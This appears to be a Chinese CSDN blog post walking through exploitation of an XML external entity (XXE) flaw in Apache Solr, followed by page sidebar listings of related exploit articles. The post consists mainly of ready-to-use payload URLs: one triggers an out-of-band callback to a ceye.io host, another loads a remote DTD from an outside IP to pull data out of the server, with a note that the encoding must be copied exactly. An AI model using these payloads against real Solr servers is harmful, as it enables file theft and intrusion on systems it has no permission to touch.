apache-solr XXE漏洞

最新推荐文章于 2023-12-01 21:25:35 发布
最新推荐文章于 2023-12-01 21:25:35 发布
阅读量477 收藏
点赞数
分类专栏: 中间件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48776804/article/details/119114232
版权

apache-solr XXE漏洞

1 验证漏洞

http://192.168.8.109:8983/solr/demo/select?q={!xmlparser%20v=%27%3C!DOCTYPE%20a%20SYSTEM%20%22http://*.ceye.io%22%3E%3Ca%3E%3C/a%3E%27}&wt=xml
在这里插入图片描述
在这里插入图片描述

2 服务器放一个dtd

在这里插入图片描述

浏览器访问:
http://xxx.xxx.xxx.xxx:8983/solr/demo/select?&q=<?xml version="1.0" ?>%ext;%ent;]>&data;&wt=xml&defType=xmlparser

http://192.168.8.109:8983/solr/demo/select?&q=%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3A%2F%2F39.106.45.206%3A8080%2Fcvcv.dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E&wt=xml&defType=xmlparser
在这里插入图片描述

3 注意

编码必须按照上上面这个

在这里插入图片描述

wx_7782175678
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
apache-solr-dataimportscheduler
10-31
apache-solr-dataimportscheduler1.4 / solr 7.5 ,天下没有免费的JAR包
Apache Solr 远程命令+XXE执行漏洞(CVE-2017-12629)
ddr12231的博客
08-09 708
Apache Solr 最近有出了个漏洞预警,先复习一下之前的漏洞 命令执行 先创建一个listener,其中设置exe的值为我们想执行的命令,args的值是命令参数 POST /solr/demo/config HTTP/1.1 Host: your-ip Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatib...
反序列化漏洞&slor XXE漏洞
Feng_Blue_的博客
10-28 250
本文仅提供于学术探讨,如有后果自行承担。 typecho反序列化漏洞Getshell复现 1.搭建漏洞环境 在搭建环境时,需要在数据库中建立于上图数据库名一样的库。 2.安装成功 显示上图则安装成功。 3. 这里需要一个payload,(这个会挂在文章下面,自行参考)。在kali上去跑一下。 4.在某狐浏览器使用hackbar来进行操作 在url后需要追加一个?finish=,利用Post传参之前,需要加上一个__typecho_config=,再在后面加上在ka...
[漏洞复现] Apache Solr XXE(CVE-2017-12629)
Vicl1fe的博客
06-10 1138
前言 什么是Lucene Lucene 是一个高效的,基于 Java 的全文检索库。 Lucene 是 apache 软件基金会 4 jakarta 项目组的一个子项目,是一个开放源代码的全 文检索引擎工具包,但它不是一个完整的全文检索引擎,而是一个全文检索引擎的架构, Lucene主要提供了一个简单、强大的应用程序接口。 什么是solr Solr 是基于 Lucene 的面向企业搜索的 web 应用 ,Solr 是一个独立的企业级搜索应用服务器。它对外提供类似于 Web-service 的 API 接 口
Apache solr XXE 漏洞(CVE-2017-12629)
最新发布
m0_73605862的博客
12-01 868
(排查了端口被占的问题,发现是可以打开目录的,是因为防火墙没关,后面关了就可以了)5.然后要用到另一个服务器上面的dtd文件,所以这里需要用http-server搭建一个服务器,先开放一个端口,然后在共享文件夹里面写入一个1.dtd。3.进入到核心的查看界面,是json的查看方式,第二张的表达方式会更直观,可以看到xxe漏洞在哪里,在那个demo那个地方。2.开始看wp的时候没有看懂为什么是core,然后去了解了一下solr的核心这个概念,然后发现是一个启动的配置。然后就出来了etc/passwd。
漏洞复现】Apache系列(二)之Solr漏洞复现
qq_45244158的博客
03-01 7204
漏洞复现】Apache系列(二)之Solr漏洞复现
solr增量更新架包apache-solr-dataimportscheduler.jar
03-26
solr增量更新-
apache-solr-dataimportscheduler-1.0.zip_official54l_solr 5.x定时生成
09-24
solr 5.x定时生成索引依赖jar
apache-solr-dataimportscheduler-1.1.jar
03-29
dataimportscheduler,没有配置文件
apache-solr-dataimportscheduler-1.4
01-28
solr6.1.0版本jar已经不再提供读取自动索引配置文件路径的方法,因此apache-solr-dataimportscheduler-1.0内调用该方法的所有操作都无法实现。于是需要下载apache-solr-dataimportscheduler-1.0-with-source.jar并...
CVE-2017-12629:Apache Solr XXE&&RCE
qq_61553520的博客
05-13 828
pache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞XXE)和远程命令执行漏洞(RCE)。漏洞影响版本:Apache Solr before 7.1 with Apache Lucene before 7.1。
Solr DIH dataConfig参数XXE漏洞
HxXh
07-13 573
0x01 背景介绍DataImportHandler主要用于从数据库抓取数据并创建索引,Solr搭建完毕,并将数据插入到MySQL等数据库之后,需要创建Core,并且对数据库中的数据生成索引,在生成索引的时候就会用到DIH。在使用solr web控制台生成core索引的时候,dataConfig参数存在xxe漏洞,攻击者可以向服务端提交恶意的xml数据,利用恶意xml数据可以读取被攻击服务器的敏感...
Apache solr XML&RCE 漏洞(CVE-2017-12629)
weixin_44047654的博客
02-22 593
Apache Solr XXE & RCE 漏洞(CVE-2017-12629)
xxe漏洞实战
weixin_30782331的博客
08-03 546
前言 在 2017 年版的 OWASP TOP 10, xxe 强势上位。 本文对网上常见的利用方式做一个汇总 正文 测试环境 win10 phpstudy 测试代码: <?php $data = file_get_contents('php://input'); echo $data; $dom = new DOMDocument(); $dom->loadXML($dat...
XXE漏洞攻防
god_Zeo的安全博客
03-08 674
XXE漏洞 1. XXE概述 XXE(XML External Entity Injection)即XML外部实体注入。漏洞是在对非安全的外部实体数据进行处理时引发的安全问题。 可以造成危害 文件读取 ssrf dos 命令执行 XML基础介绍 XML是可扩展的标记语言(eXtensible Markup Language),设计用来进行数据的传输和存储。 下面我们主要介绍PHP语言下的XXE...
1.7服务端漏洞——XXE漏洞原理
The code way of kinnisoy
07-07 557
XXE漏洞原理 1.XXE是什么 XXE全称是——XML External Entity,也就是XML外部实体注入攻击.漏洞是在对不安全的外部实体数据进行处理时引发的安全问题。 xml实体注入就是利用了客户端返回xml提交数据时,注入远程调用xml实体的代码来实现一些想要的功能。 要想搞懂XXE,肯定要先了解XML语法规则和外部实体的定义及调用形式。 2.XML介绍 XML数据传输类型(同类:JSON 序列化) XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 语法规则: 1.所有的X
Apache solr xxe漏洞复现(CVE-2017-12629)
whojoe的博客
07-06 1891
Apache solr xxe漏洞复现(CVE-2017-12629)前言环境搭建漏洞复现参考文章 前言 影响版本 Apache Solr < 7.1 Apache Lucene < 7.1 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/solr/CVE-2017-12629-X
shiro反序列化
热门推荐
weixin_48776804的博客
05-12 1万+
shiro反序列化
jboss反序列化漏洞
weixin_48776804的博客
05-17 1216
jboss反序列化漏洞
infra-solr 什么配置文件查看是否开启kerberos验证
05-27
如果你的 Infra Solr 集群开启了 Kerberos 认证,可以通过查看 Solr 的配置文件来确认。 在 Solr 的配置文件目录中,通常包含有一个 `solr.in.sh` 或 `solr.in.cmd` 文件,这个文件包含了 Solr 的启动参数配置。你...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值